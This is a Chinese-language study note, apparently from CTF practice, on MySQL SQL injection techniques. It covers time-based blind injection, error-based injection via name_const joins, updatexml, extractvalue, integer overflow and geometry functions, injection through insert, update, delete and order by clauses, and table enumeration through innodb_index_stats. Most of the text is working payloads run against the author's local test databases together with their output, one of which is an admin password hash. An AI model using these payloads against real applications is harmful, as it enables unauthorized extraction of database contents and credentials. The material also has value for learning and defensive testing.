基于时间的盲注 sql注入
BENCHMARK(count,expr)
benchmark 函数会重复执行expr表达式count次,我们尽可能多的执行expr来达到延时的作用
###### sleep(time)
###### 笛卡尔积
我们进行多表合并,耗费较长时间,达到延时的效果
###### get_lock()
1.开了一个session,对关键字进行了get_lock. (get_lock(‘a’,5))
2.那么再开另一个session再次对关键进行get_lock. 就会延时我们指定的时间。get_lock(‘a’,5)
2个session是主要
报错注入
name_const
mysql列名重复会导致报错,通过name_const制造一个列
但有个约束条件就是version()所对应的值必须是常量,否则会报错
我们可以利用mysql列名重复会导致报错这个原理配合join函数得到列名
using 等价join 中的On
mysql root@localhost:classmgr> select * from (select * from admin a join admin b)x;
(1060, u"Duplicate column name 'id'")
mysql root@localhost:classmgr> select * from (select * from admin a join admin b using(id))x;
(1060, u"Duplicate column name 'username'")
mysql root@localhost:classmgr> select * from (select * from admin a join admin b using(id,username))x;
(1060, u"Duplicate column name 'password'")
mysql root@localhost:classmgr> select * from (select * from admin a join admin b using(id,username,password))x;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | CF60265A469500B5FF25CC10E4AB78D1 |
+----+----------+----------------------------------+
1 row in set
Time: 0.011s
xpath语法报错
1.updatexml
不符合规定的Xpath,MySQL就会报语法错误,并显示XPath的内容.,且从特殊字符开始报错
mysql root@localhost:classmgr> select updatexml(1,(select user()),1);
(1105, u"XPATH syntax error: '@localhost'")
mysql root@localhost:classmgr> select user();
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set
Time: 0.013s
mysql root@localhost:classmgr>
故添加聚合函数
mysql root@localhost:classmgr> select updatexml(1,concat('~',(select user()),'~'),1);
(1105, u"XPATH syntax error: '~root@localhost~'")
mysql root@localhost:classmgr>
extractvalue报错原理与上面一样
mysql root@localhost:classmgr> select extractvalue(1,concat('~',(select user())));
(1105, u"XPATH syntax error: '~root@localhost'")
整数溢出
~0,pow(),cot(),exp()
我们对数值0逐位取反,会报BIGINT溢出错误。
mysql root@localhost:classmgr> select ~0
+----------------------+
| ~0 |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set
Time: 0.010s
mysql root@localhost:classmgr> select 1+~0
(1690, u"BIGINT UNSIGNED value is out of range in '(1 + ~(0))'")
mysql root@localhost:classmgr> select 1-~0
(1690, u"BIGINT UNSIGNED value is out of range in '(1 - ~(0))'")
用于注入中,我们知道,如果一个查询成功返回,其返回值为0,所以对其进行逻辑非的话就会变成1
mysql root@localhost:classmgr> select !(select user())x;
+---+
| x |
+---+
| 1 |
+---+
1 row in set
Time: 0.364s
mysql root@localhost:classmgr>
但应该是mysql版本问题,网上说的报数据的方法没有成功
几何函数报错
几何函数进行报错注入,如polygon(),linestring()函数等,网上说的报数据的方法没有成功
mysql root@localhost:classmgr> select * from admin where id=1 and polygon(id);
(1367, u"Illegal non geometric '`classmgr`.`admin`.`id`' value found during parsing")
mysql root@localhost:classmgr> select * from admin where id=1 and linestring(id);
(1367, u"Illegal non geometric '`classmgr`.`admin`.`id`' value found during parsing")
对于insert,delete,update三种操作的注入
mysql root@localhost:classmgr> insert into admin(id,username,password) values ('1' or updatexml(1,concat('~',(select database()),0x7e),1) or '','2');
(1105, u"XPATH syntax error: '~classmgr~'")
mysql root@localhost:classmgr> update admin set username=1 where id=1 and updatexml(1,concat('~',(select user())),1);
(1105, u"XPATH syntax error: '~root@localhost'")
mysql root@localhost:classmgr>
mysql root@localhost:classmgr> delete from admin where id=1 and updatexml(1,concat('~',(select user())),1);
(1105, u"XPATH syntax error: '~root@localhost'")
insert ,update,delete的时间盲注与此类似
order by 注入
布尔盲注
rand(false)与rand(true)的显示效果不同
##### 时间盲注
mysql root@localhost:classmgr> select * from admin order by 1 and if(substr((select database()),1,1)='c',sleep(4),1);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | CF60265A469500B5FF25CC10E4AB78D1 |
+----+----------+----------------------------------+
1 row in set
Time: 0.011s
MySQL数据库的Innodb引擎的注入
此时可以通过innodb引擎进行注入(innodb引擎开启),在Mysql 5.6以上的版本中,在系统Mysql库中存在两张与innodb相关的表:innodb_table_stats和innodb_index_stats。当然这需要root权限
mysql root@(none):CTFd> select * from runoob_tbl where runoob_id=1 union select group_concat(table_name),2,3,4 from mysql.innodb_index_stats where database_name=database();
+----------------------------------+--------------+---------------+-----------------+
| runoob_id | runoob_title | runoob_author | submission_date |
+----------------------------------+--------------+---------------+-----------------+
| 1 | aa | bb | <null> |
| runoob_tbl,runoob_tbl,runoob_tbl | 2 | 3 | 4 |
+----------------------------------+--------------+---------------+-----------------+
mysql root@(none):CTFd> select * from runoob_tbl where runoob_id=1 union select group_concat(database_name),2,3,4 from mysql.innodb_index_stats
+----------------------------------------+--------------+---------------+-----------------+
| runoob_id | runoob_title | runoob_author | submission_date |
+----------------------------------------+--------------+---------------+-----------------+
| 1 | aa | bb | <null> |
| CTFd,CTFd,CTFd,mysql,mysql,mysql,mysql | 2 | 3 | 4 |
+----------------------------------------+--------------+---------------+-----------------+
2 rows in set
Time: 0.012s
查询innodb_table_stats也可以
参考资料
https://xz.aliyun.com/t/5505#toc-3